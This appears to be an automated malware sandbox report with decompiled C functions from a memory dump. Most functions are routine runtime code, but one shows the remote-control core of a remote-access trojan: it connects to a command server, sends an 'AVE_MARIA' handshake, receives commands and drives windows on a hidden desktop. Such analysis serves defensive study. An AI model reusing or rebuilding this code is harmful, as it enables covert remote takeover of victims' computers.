Instruction ID: d41646c2cad0681c8e64c8d21194c185906c652467c4dc6e4a22e03696d32a81
Opcode Fuzzy Hash: 2365dd5eacc65c3c6cdd9eae6a1093b3e97f57b8538579a9ab7d8113f9476d0b
Instruction Fuzzy Hash: 0B41E870A10108AFDB14EF58C8C1BA97BE1EF49369F2881E8FC48AB351D7719D49C751

Uniqueness

Uniqueness Score: -1.00%

Function 00B588EC, Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00B588EC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t26;
				void* _t35;

				E00B586BD(_t35,  &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 == 0) {
					L3:
					return 0;
				}
				_t26 = E00B61E53( &_v8, _a4, _v20, _a12, 0x180); // executed
				if(_t26 != 0) {
					goto L3;
				}
				 *0xb6a6c4 =  *0xb6a6c4 + 1;
				asm("lock or [eax], ecx");
				 *((intOrPtr*)(_a16 + 8)) = 0;
				 *((intOrPtr*)(_a16 + 0x1c)) = 0;
				 *((intOrPtr*)(_a16 + 4)) = 0;
				 *_a16 = 0;
				 *((intOrPtr*)(_a16 + 0x10)) = _v8;
				return _a16;
			}

0x00b588fd
0x00b58909
0x00b5890a
0x00b5890b
0x00b58912
0x00b5896b
0x00000000
0x00b5896b
0x00b58926
0x00b58930
0x00000000
0x00000000
0x00b58935
0x00b58941
0x00b58949
0x00b5894f
0x00b58955
0x00b5895b
0x00b58963
0x00000000

APIs

__wsopen_s.LIBCMT ref: 00B58926

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: b3cb8b342a06ee029657eb679751cb05c2b2606fdf6fde61f7cf7d4248824aac
Instruction ID: a3ae17a7773bca563d3144d28c4674d38f7ad45e8f30474afcb6b4ab0927c7b2
Opcode Fuzzy Hash: b3cb8b342a06ee029657eb679751cb05c2b2606fdf6fde61f7cf7d4248824aac
Instruction Fuzzy Hash: D3115A71904109AFCF05DF59E940AAA7BF4EF48300F054099FC08AB311DB31DE25CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B510AF, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00B510AF(void* __ecx, intOrPtr _a4) {
				void* _t16;
				signed int _t24;
				signed int _t25;
				intOrPtr _t27;

				_t27 = _a4;
				if(_t27 == 0) {
					 *((intOrPtr*)(E00B55BBD())) = 0x16;
					return E00B528EC() | 0xffffffff;
				}
				_push(_t24);
				_t25 = _t24 | 0xffffffff;
				if(( *(_t27 + 0xc) >> 0x0000000d & 0x00000001) != 0) {
					_t25 = E00B58E48(_t27);
					E00B58C3D(_t27);
					_t16 = E00B58B12(E00B572EE(_t27)); // executed
					if(_t16 >= 0) {
						if( *(_t27 + 0x1c) != 0) {
							E00B564B8( *(_t27 + 0x1c));
							 *(_t27 + 0x1c) =  *(_t27 + 0x1c) & 0x00000000;
						}
					} else {
						_t25 = _t25 | 0xffffffff;
					}
				}
				E00B585BE(_t27);
				return _t25;
			}

0x00b510b5
0x00b510ba
0x00b510c1
0x00000000
0x00b510cc
0x00b510d4
0x00b510d5
0x00b510de
0x00b510e7
0x00b510e9
0x00b510f5
0x00b510ff
0x00b5110a
0x00b5110f
0x00b51114
0x00b51118
0x00b51101
0x00b51101
0x00b51101
0x00b510ff
0x00b5111a
0x00000000

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dd8b88350270aaf24a09ddd4470c35913539a64d84663df9b0b228a94f877a7
Instruction ID: 84c4f11138dcf8aa5796d93a2edf5cdcc7f034c2f74e8af58a5ed54a0e107839
Opcode Fuzzy Hash: 5dd8b88350270aaf24a09ddd4470c35913539a64d84663df9b0b228a94f877a7
Instruction Fuzzy Hash: E5F0F432901A141BDA213A2E9C06B6A32DC8F52337F140BD5FE75A31D2DF78D80E86E1

Uniqueness

Uniqueness Score: -1.00%

Function 00B61DE3, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00B61DE3(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t22;
				void* _t25;
				signed int _t27;
				signed int _t28;

				_t25 = __ecx;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(E00B55F7B(_t25, _a12,  &_v28, E00B56E67(__eflags)) == 0) {
					_push(_a28);
					_t22 = E00B61E73(_t25, __eflags, _a4, _a8, _v20, _a16, _a20, _a24); // executed
					_t28 = _t22;
				} else {
					_t28 = _t27 | 0xffffffff;
				}
				if(_v8 != 0) {
					E00B564B8(_v20);
				}
				return _t28;
			}

0x00b61de3
0x00b61dee
0x00b61df1
0x00b61df4
0x00b61df7
0x00b61dfa
0x00b61dfd
0x00b61e17
0x00b61e1e
0x00b61e33
0x00b61e3b
0x00b61e19
0x00b61e19
0x00b61e19
0x00b61e41
0x00b61e46
0x00b61e4b
0x00b61e52

APIs

_free.LIBCMT ref: 00B61E46

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 8143ebf9a4dcf1776887806264379338a6a5d6e367bb4900f7508eeb9ee533c7
Instruction ID: 310b44d34e6b3c33fd2e3079c51a67cfa9bde75f0eb85e3dba804b4fb5afecf7
Opcode Fuzzy Hash: 8143ebf9a4dcf1776887806264379338a6a5d6e367bb4900f7508eeb9ee533c7
Instruction Fuzzy Hash: D2012172C01159BFCF02AFA8DC01AEE7FF5AB08310F5445A5FD14A2151E6368A249B91

Uniqueness

Uniqueness Score: -1.00%

Function 00B56F1C, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B56F1C(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00B55BBD())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xb6a9c4, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00B54AF9();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00B54B44(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00b56f22
0x00b56f28
0x00b56f5a
0x00b56f5f
0x00b56f65
0x00000000
0x00b56f65
0x00b56f2c
0x00b56f2e
0x00b56f2e
0x00b56f45
0x00b56f4e
0x00b56f56
0x00000000
0x00000000
0x00b56f36
0x00b56f38
0x00000000
0x00000000
0x00b56f3b
0x00b56f41
0x00b56f43
0x00000000
0x00000000
0x00b56f43
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00B5084B,00000002,?,?,?,00B424A9,00000000,0000002C,00B425BB), ref: 00B56F4E

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 54405ab98f22ca1b1593eaefd04978aadc7b74b1554d8c937a5eff735678ccda
Instruction ID: 27a844bddbb320cd7a956409ceb79f8cf33db31d1468fc752bb85c42a153a3e3
Opcode Fuzzy Hash: 54405ab98f22ca1b1593eaefd04978aadc7b74b1554d8c937a5eff735678ccda
Instruction Fuzzy Hash: CFE0E531A053116AD6203665AC05B5A37C8EB613A7F5501D0ED55971C0DFA4CC4885B5

Uniqueness

Uniqueness Score: -1.00%

Function 00B61B26, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B61B26(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}

0x00b61b43
0x00b61b4a

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00B61F1C,?,?,00000000,?,00B61F1C,00000000,0000000C), ref: 00B61B43

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dd61c6aabfafea9183610f378d9162387567f51b8f11bc8ebf94e5197ed9b119
Instruction ID: cdb13f47e2ca44311242c625e7518ff402c840f80f0b42531de72617250d4bb2
Opcode Fuzzy Hash: dd61c6aabfafea9183610f378d9162387567f51b8f11bc8ebf94e5197ed9b119
Instruction Fuzzy Hash: 04D06C3205410DBBDF028F84DC06EDA3BAAFB48714F014000FA1856060CB76E831AB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B45BB1, Relevance: 73.9, APIs: 37, Strings: 5, Instructions: 445
windownetworkthreadCOMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			E00B45BB1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				signed int _v24;
				char _v376;
				char _v404;
				struct _WINDOWPLACEMENT _v420;
				struct tagRECT _v436;
				struct tagRECT _v452;
				char _v454;
				short _v456;
				char _v460;
				char _v462;
				short _v464;
				char _v468;
				int _v476;
				signed int _v480;
				struct tagPOINT _v488;
				struct HWND__* _v492;
				long _v496;
				int _v500;
				long _v504;
				struct tagPOINT _v512;
				intOrPtr _v516;
				signed int _v520;
				intOrPtr _v524;
				void* __ebp;
				signed int _t119;
				int _t139;
				signed int _t140;
				signed int _t151;
				signed int _t154;
				unsigned int _t158;
				signed short _t160;
				struct HWND__* _t161;
				int _t162;
				int _t165;
				struct HMENU__* _t183;
				long _t189;
				struct tagPOINT _t198;
				long _t204;
				struct HWND__* _t206;
				long _t210;
				struct tagPOINT _t214;
				int _t215;
				CHAR* _t216;
				void* _t217;
				signed short _t218;
				intOrPtr _t220;
				int _t222;
				intOrPtr _t225;
				long _t227;
				intOrPtr _t228;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				struct HMENU__* _t240;
				intOrPtr* _t243;
				intOrPtr* _t245;
				struct HWND__* _t246;
				signed short _t247;
				int _t250;
				struct HWND__* _t251;
				int _t254;
				void* _t257;
				signed int _t258;
				signed int _t260;
				void* _t268;

				_t260 = (_t258 & 0xfffffff8) - 0x1a4;
				_t119 =  *0xb69014; // 0x26ce9e99
				_v8 = _t119 ^ _t260;
				_push(__esi);
				_push(__edi);
				_t225 = E00B446F7(__edi, __esi);
				_v436.bottom = _t225;
				SetThreadDesktop( *0xb6ae3c);
				_t243 = __imp__#19;
				_t204 = 0;
				_push(0);
				_push(0xa);
				_push("AVE_MARIA");
				_push(_t225);
				if( *_t243() <= 0) {
					L47:
					return E00B4AE43(_v24 ^ _t260);
				}
				_push(0);
				_push(4);
				_v420.ptMinPosition = 1;
				_push( &(_v420.ptMinPosition));
				_push(_t225);
				if( *_t243() <= 0) {
					goto L47;
				}
				_t245 = __imp__#16;
				_push(0);
				_push(4);
				_push( &_v404);
				_push(_t225);
				if( *_t245() == 0) {
					goto L47;
				}
				 *0xb6ae34 = CreateThread(0, 0, E00B44798, 0, 0, 0);
				_v436.top = 0;
				_v452.right = 0;
				_v452.top = 0;
				_v452.bottom = 0;
				_v436.left = 0;
				E00B457CD(0, _t225, _t245, _t257);
				_push(0);
				_push(4);
				_push( &_v452);
				_push(_t225);
				if( *_t245() <= 0) {
					L46:
					TerminateThread( *0xb6ae34, _t204);
					goto L47;
				}
				_t206 = _v452.bottom;
				while(1) {
					_push(0);
					_push(4);
					_push( &(_v452.right));
					_push(_t225);
					if( *_t245() <= 0) {
						break;
					}
					_push(0);
					_push(4);
					_push( &_v488);
					_push(_t225);
					if( *_t245() <= 0) {
						break;
					}
					_t139 = _v500;
					_v520 = 0;
					_t268 = _t139 - 0x404;
					if(_t268 > 0) {
						_t140 = _t139 - 0x405;
						__eflags = _t140;
						if(__eflags == 0) {
							E00B456CF(_t206, _t225, _t245, __eflags);
							L31:
							ScreenToClient(_t206,  &_v512);
							_push(_v512.y);
							_push(_v512.x);
							_push(_t206);
							while(1) {
								_t246 = ChildWindowFromPoint();
								if(_t246 == 0) {
									break;
								}
								__eflags = _t246 - _t206;
								if(__eflags == 0) {
									break;
								}
								_t206 = _t246;
								ScreenToClient(_t246,  &_v512);
								_push(_v512.y);
								_push(_v512.x);
								_push(_t246);
							}
							if(_v520 == 0) {
								_t210 = _v504;
							} else {
								_t210 = (_v512.y & 0x0000ffff) << 0x00000010 | _v512.x & 0x0000ffff;
								_v504 = _t210;
							}
							PostMessageA(_t206, _v500, _v476, _t210);
							L44:
							_t245 = __imp__#16;
							_push(0);
							_push(4);
							_push( &_v500);
							_push(_t225);
							if( *_t245() > 0) {
								continue;
							}
							break;
						}
						_t151 = _t140 - 1;
						__eflags = _t151;
						if(_t151 == 0) {
							E00B462A9();
							_t220 =  *0xb6ae38; // 0x0
							E00B46268(0xb6ad28, _t220);
							goto L47;
						}
						_t154 = _t151 - 1;
						__eflags = _t154;
						if(_t154 == 0) {
							E00B462A9();
							goto L47;
						}
						__eflags = _t154 - 1;
						if(__eflags == 0) {
							E00B44CEE(_t206, _t225, _t245, __eflags);
							goto L31;
						}
						L23:
						_t158 = _v504;
						_t227 = _v488.x;
						_t247 = _v488.y;
						_t214 = _t158;
						_t160 = _t158 >> 0x10;
						_push(_t160);
						_v520 = 1;
						_v512.x = _t214;
						_v512.y = _t160;
						_v488.x = _t214;
						_v488.y = _t160;
						_t161 = WindowFromPoint(_t214);
						__eflags = _v500 - 0x202;
						_t206 = _t161;
						if(_v500 != 0x202) {
							__eflags = _v500 - 0x201;
							if(_v500 != 0x201) {
								__eflags = _v500 - 0x200;
								if(__eflags != 0) {
									L30:
									_t225 = _v524;
									goto L31;
								}
								__eflags = _v480;
								if(__eflags == 0) {
									L43:
									_t225 = _v524;
									goto L44;
								}
								_t162 = _v492;
								__eflags = _t162;
								if(_t162 != 0) {
									_t206 = _t162;
								} else {
									_v496 = SendMessageA(_t206, 0x84, _t162, _v504);
								}
								_t228 = _t227 - _v512.x;
								_v520 = _t228;
								_v516 = _t247 - _v512.y;
								GetWindowRect(_t206,  &_v452);
								_t165 = _v452.left;
								_t222 = _v452.right - _t165;
								_t215 = _v452.top;
								_t250 = _v452.bottom - _t215;
								__eflags = _v496 - 0xd;
								if(__eflags > 0) {
									_t230 = _v496 - 0xe;
									__eflags = _t230;
									if(_t230 == 0) {
										_t215 = _t215 - _v516;
										_t250 = _t250 + _v516;
										__eflags = _t250;
										goto L75;
									}
									_t231 = _t230 - 1;
									__eflags = _t231;
									if(__eflags == 0) {
										_t250 = _t250 - _v516;
										goto L76;
									}
									_t232 = _t231 - 1;
									__eflags = _t232;
									if(_t232 == 0) {
										_t250 = _t250 - _v516;
										__eflags = _t250;
										goto L72;
									}
									__eflags = _t232 - 1;
									if(__eflags != 0) {
										goto L43;
									}
									_t250 = _t250 - _v516;
									goto L75;
								} else {
									if(__eflags == 0) {
										_t215 = _t215 - _v516;
										_t165 = _t165 - _t228;
										_t250 = _t250 + _v516;
										_t222 = _t222 + _t228;
										L76:
										MoveWindow(_t206, _t165, _t215, _t222, _t250, 0);
										_v492 = _t206;
										goto L43;
									}
									_t236 = _v496;
									__eflags = _t236;
									if(__eflags == 0) {
										_t165 = _t165 - _v520;
										_t215 = _t215 - _v516;
										goto L76;
									}
									_t237 = _t236 - 8;
									__eflags = _t237;
									if(__eflags == 0) {
										L72:
										_t165 = _t165 - _v520;
										_t222 = _t222 + _v520;
										goto L76;
									}
									_t238 = _t237 - 1;
									__eflags = _t238;
									if(_t238 == 0) {
										L75:
										_t222 = _t222 - _v520;
										__eflags = _t222;
										goto L76;
									}
									__eflags = _t238 - 1;
									if(__eflags != 0) {
										goto L43;
									}
									_t215 = _t215 - _v516;
									_t250 = _t250 + _v516;
									goto L76;
								}
							}
							__eflags = 0;
							_v480 = 1;
							_v492 = 0;
							_t216 = 0;
							_v468 = 0x37363402;
							_v464 = 0x2b2b;
							_v462 = 0;
							do {
								_t48 = _t216 + 0x40; // 0x40
								 *(_t260 + _t216 + 0x44) =  *(_t260 + _t216 + 0x44) ^ _t48;
								_t216 = _t216 + 1;
								__eflags = _t216 - 6;
							} while (_t216 < 6);
							_v462 = 0;
							_t251 = FindWindowA( &_v468, 0);
							GetWindowRect(_t251,  &_v436);
							_push(_v512.y);
							__eflags = PtInRect( &_v436, _v512.x);
							if(__eflags == 0) {
								E00B4D0F0(_t227,  &_v376, 0, 0x104);
								_t260 = _t260 + 0xc;
								RealGetWindowClassA(_t206,  &_v376, 0x104);
								_v460 = 0x74707263;
								_t217 = 0;
								__eflags = 0;
								_v456 = 0x7d72;
								_v454 = 0;
								do {
									_t67 = _t217 + 0x40; // 0x40
									 *(_t260 + _t217 + 0x4c) =  *(_t260 + _t217 + 0x4c) ^ _t67;
									_t217 = _t217 + 1;
									__eflags = _t217 - 6;
								} while (_t217 < 6);
								_t72 =  &_v460; // 0x74707263
								_v454 = 0;
								__eflags = lstrcmpA( &_v376, _t72);
								if(__eflags != 0) {
									goto L30;
								}
								_t183 = SendMessageA(_t206, 0x1e1, 0, 0);
								_push(_v512.y);
								_t240 = _t183;
								_t254 = MenuItemFromPoint(0, _t240, _v512.x);
								GetMenuItemID(_t240, _t254);
								PostMessageA(_t206, 0x1e5, _t254, 0);
								PostMessageA(_t206, 0x100, 0xd, 0);
								goto L43;
							}
							PostMessageA(_t251, 0xf5, 0, 0);
							goto L43;
						}
						_v480 = 0;
						_t189 = SendMessageA(_t206, 0x84, 0, _v504);
						__eflags = _t189 - 0xffffffff;
						if(__eflags == 0) {
							SetWindowLongA(_t206, 0xfffffff0, GetWindowLongA(_t206, 0xfffffff0) | 0x08000000);
							SendMessageA(_t206, 0x84, 0, _v504);
							goto L30;
						}
						__eflags = _t189 - 8;
						if(__eflags == 0) {
							_push(0);
							_push(0xf020);
							L34:
							_push(0x112);
							L29:
							PostMessageA(_t206, ??, ??, ??);
							goto L30;
						}
						__eflags = _t189 - 9;
						if(_t189 == 9) {
							_v420.length = 0x2c;
							GetWindowPlacement(_t206,  &_v420);
							__eflags = _v420.flags & 0x00000003;
							_push(0);
							if(__eflags == 0) {
								_push(0xf030);
							} else {
								_push(0xf120);
							}
							goto L34;
						}
						__eflags = _t189 - 0x14;
						if(__eflags != 0) {
							goto L30;
						}
						_push(0);
						_push(0);
						_push(0x10);
						goto L29;
					}
					if(_t268 == 0) {
						E00B44F57(_t206, _t225, _t245, __eflags);
						goto L31;
					}
					if(_t139 < 0x100) {
						goto L23;
					}
					if(_t139 <= 0x102) {
						_t218 = _v488.y;
						_t198 = _v488;
						_push(_t218);
						_v512 = _t198;
						_v512.y = _t218;
						_t206 = WindowFromPoint(_t198);
						goto L31;
					}
					if(_t139 == 0x401) {
						E00B457CD(_t206, _t225, _t245, _t257);
						goto L31;
					}
					if(_t139 == 0x402) {
						CreateThread(0, 0, E00B45A71, 0, 0, 0);
						goto L31;
					}
					_t273 = _t139 - 0x403;
					if(_t139 != 0x403) {
						goto L23;
					}
					E00B44A91(_t206, _t225, _t245, _t257, _t273);
					goto L31;
				}
				_t204 = 0;
				goto L46;
			}

0x00b45bb7
0x00b45bbd
0x00b45bc4
0x00b45bcc
0x00b45bcd
0x00b45bd9
0x00b45bdb
0x00b45bdf
0x00b45be5
0x00b45beb
0x00b45bed
0x00b45bee
0x00b45bf0
0x00b45bf5
0x00b45bfa
0x00b45efc
0x00b45f12
0x00b45f12
0x00b45c00
0x00b45c01
0x00b45c07
0x00b45c0f
0x00b45c10
0x00b45c15
0x00000000
0x00000000
0x00b45c1b
0x00b45c25
0x00b45c26
0x00b45c28
0x00b45c29
0x00b45c2e
0x00000000
0x00000000
0x00b45c44
0x00b45c49
0x00b45c4d
0x00b45c51
0x00b45c55
0x00b45c59
0x00b45c5d
0x00b45c62
0x00b45c63
0x00b45c69
0x00b45c6a
0x00b45c6f
0x00b45eef
0x00b45ef6
0x00000000
0x00b45ef6
0x00b45c75
0x00b45c79
0x00b45c79
0x00b45c7b
0x00b45c81
0x00b45c82
0x00b45c87
0x00000000
0x00000000
0x00b45c8d
0x00b45c8f
0x00b45c95
0x00b45c96
0x00b45c9b
0x00000000
0x00000000
0x00b45ca1
0x00b45cac
0x00b45cb0
0x00b45cb2
0x00b45d2f
0x00b45d2f
0x00b45d34
0x00b460e2
0x00b45dd4
0x00b45dda
0x00b45de0
0x00b45de4
0x00b45de8
0x00b46107
0x00b4610d
0x00b46111
0x00000000
0x00000000
0x00b460ec
0x00b460ee
0x00000000
0x00000000
0x00b460f4
0x00b460f8
0x00b460fe
0x00b46102
0x00b46106
0x00b46106
0x00b46118
0x00b4612f
0x00b4611a
0x00b46127
0x00b46129
0x00b46129
0x00b4613d
0x00b45ed3
0x00b45ed3
0x00b45edd
0x00b45edf
0x00b45ee1
0x00b45ee2
0x00b45ee7
0x00000000
0x00000000
0x00000000
0x00b45ee7
0x00b45d3a
0x00b45d3a
0x00b45d3d
0x00b46152
0x00b46157
0x00b46162
0x00000000
0x00b46162
0x00b45d43
0x00b45d43
0x00b45d46
0x00b46148
0x00000000
0x00b46148
0x00b45d4c
0x00b45d4f
0x00b460d8
0x00000000
0x00b460d8
0x00b45d55
0x00b45d55
0x00b45d59
0x00b45d5d
0x00b45d61
0x00b45d67
0x00b45d68
0x00b45d6a
0x00b45d72
0x00b45d76
0x00b45d7a
0x00b45d7e
0x00b45d82
0x00b45d88
0x00b45d90
0x00b45d92
0x00b45e4c
0x00b45e54
0x00b45fce
0x00b45fd6
0x00b45dd0
0x00b45dd0
0x00000000
0x00b45dd0
0x00b45fdc
0x00b45fe1
0x00b45ecf
0x00b45ecf
0x00000000
0x00b45ecf
0x00b45fe7
0x00b45feb
0x00b45fed
0x00b46006
0x00b45fef
0x00b46000
0x00b46000
0x00b46008
0x00b46016
0x00b4601a
0x00b4601e
0x00b4602c
0x00b46030
0x00b46032
0x00b46036
0x00b46038
0x00b4603d
0x00b46084
0x00b46084
0x00b46087
0x00b460b6
0x00b460ba
0x00b460ba
0x00000000
0x00b460ba
0x00b46089
0x00b46089
0x00b4608c
0x00b460b0
0x00000000
0x00b460b0
0x00b4608e
0x00b4608e
0x00b46091
0x00b460a2
0x00b460a2
0x00000000
0x00b460a2
0x00b46093
0x00b46096
0x00000000
0x00000000
0x00b4609c
0x00000000
0x00b4603f
0x00b4603f
0x00b46072
0x00b46076
0x00b46078
0x00b4607c
0x00b460c2
0x00b460c9
0x00b460cf
0x00000000
0x00b460cf
0x00b46046
0x00b46046
0x00b46049
0x00b46068
0x00b4606c
0x00000000
0x00b4606c
0x00b4604b
0x00b4604b
0x00b4604e
0x00b460a6
0x00b460a6
0x00b460aa
0x00000000
0x00b460aa
0x00b46050
0x00b46050
0x00b46053
0x00b460be
0x00b460be
0x00b460be
0x00000000
0x00b460be
0x00b46055
0x00b46058
0x00000000
0x00000000
0x00b4605e
0x00b46062
0x00000000
0x00b46062
0x00b4603d
0x00b45e5a
0x00b45e5c
0x00b45e64
0x00b45e68
0x00b45e6a
0x00b45e72
0x00b45e79
0x00b45e7d
0x00b45e7d
0x00b45e80
0x00b45e84
0x00b45e85
0x00b45e85
0x00b45e8f
0x00b45e9a
0x00b45ea2
0x00b45ea8
0x00b45ebb
0x00b45ebd
0x00b45f25
0x00b45f2a
0x00b45f37
0x00b45f3d
0x00b45f45
0x00b45f45
0x00b45f47
0x00b45f4e
0x00b45f53
0x00b45f53
0x00b45f56
0x00b45f5a
0x00b45f5b
0x00b45f5b
0x00b45f60
0x00b45f64
0x00b45f78
0x00b45f7a
0x00000000
0x00000000
0x00b45f8a
0x00b45f90
0x00b45f94
0x00b45fa2
0x00b45fa6
0x00b45fbb
0x00b45fc7
0x00000000
0x00b45fc7
0x00b45ec9
0x00000000
0x00b45ec9
0x00b45dab
0x00b45daf
0x00b45db1
0x00b45db4
0x00b45e37
0x00b45e48
0x00000000
0x00b45e48
0x00b45db6
0x00b45db9
0x00b45e1d
0x00b45e1e
0x00b45e0f
0x00b45e0f
0x00b45dc9
0x00b45dca
0x00000000
0x00b45dca
0x00b45dbb
0x00b45dbe
0x00b45df2
0x00b45dfc
0x00b45e02
0x00b45e07
0x00b45e08
0x00b45e16
0x00b45e0a
0x00b45e0a
0x00b45e0a
0x00000000
0x00b45e08
0x00b45dc0
0x00b45dc3
0x00000000
0x00000000
0x00b45dc5
0x00b45dc6
0x00b45dc7
0x00000000
0x00b45dc7
0x00b45cb4
0x00b45d25
0x00000000
0x00b45d25
0x00b45cbb
0x00000000
0x00000000
0x00b45cc6
0x00b45d06
0x00b45d0a
0x00b45d0e
0x00b45d10
0x00b45d14
0x00b45d1e
0x00000000
0x00b45d1e
0x00b45ccd
0x00b45cfc
0x00000000
0x00b45cfc
0x00b45cd4
0x00b45cf1
0x00000000
0x00b45cf1
0x00b45cd6
0x00b45cdb
0x00000000
0x00000000
0x00b45cdd
0x00000000
0x00b45cdd
0x00b45eed
0x00000000

APIs

Part of subcall function 00B446F7: WSAStartup.WS2_32(00000202,?), ref: 00B44718
Part of subcall function 00B446F7: socket.WS2_32(00000002,00000001,00000000), ref: 00B44729
Part of subcall function 00B446F7: gethostbyname.WS2_32(00B6AD28), ref: 00B4473B
Part of subcall function 00B446F7: htons.WS2_32(00000000), ref: 00B44763
Part of subcall function 00B446F7: connect.WS2_32(00000000,?,00000010), ref: 00B44774

SetThreadDesktop.USER32 ref: 00B45BDF
send.WS2_32(00000000,AVE_MARIA,0000000A,00000000), ref: 00B45BF6
send.WS2_32(00000000,?), ref: 00B45C11
recv.WS2_32(00000000,?,00000004,00000000), ref: 00B45C2A
CreateThread.KERNEL32(00000000,00000000,Function_00014798,00000000,00000000,00000000), ref: 00B45C3E

Part of subcall function 00B457CD: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 00B45892
Part of subcall function 00B457CD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00B458BA
Part of subcall function 00B457CD: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,?), ref: 00B458DC
Part of subcall function 00B457CD: GetWindowsDirectoryA.KERNEL32(?,00000104,770BE3A0,?,00000000), ref: 00B458FE
Part of subcall function 00B457CD: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00B4592A

recv.WS2_32(00000000,?,00000004,00000000), ref: 00B45C6B
recv.WS2_32(00000000,?,00000004,00000000), ref: 00B45C83
recv.WS2_32(00000000,?,00000004,00000000), ref: 00B45C97
CreateThread.KERNEL32(00000000,00000000,Function_00015A71,00000000,00000000,00000000), ref: 00B45CF1

Part of subcall function 00B44A91: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000,00000000,770BE3A0,?,?), ref: 00B44ADE
Part of subcall function 00B44A91: lstrcatA.KERNEL32(00000000,?), ref: 00B44B2F
Part of subcall function 00B44A91: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000), ref: 00B44B52
Part of subcall function 00B44A91: lstrcatA.KERNEL32(00000000,?,?), ref: 00B44B9B

WindowFromPoint.USER32(?,00000001), ref: 00B45D18
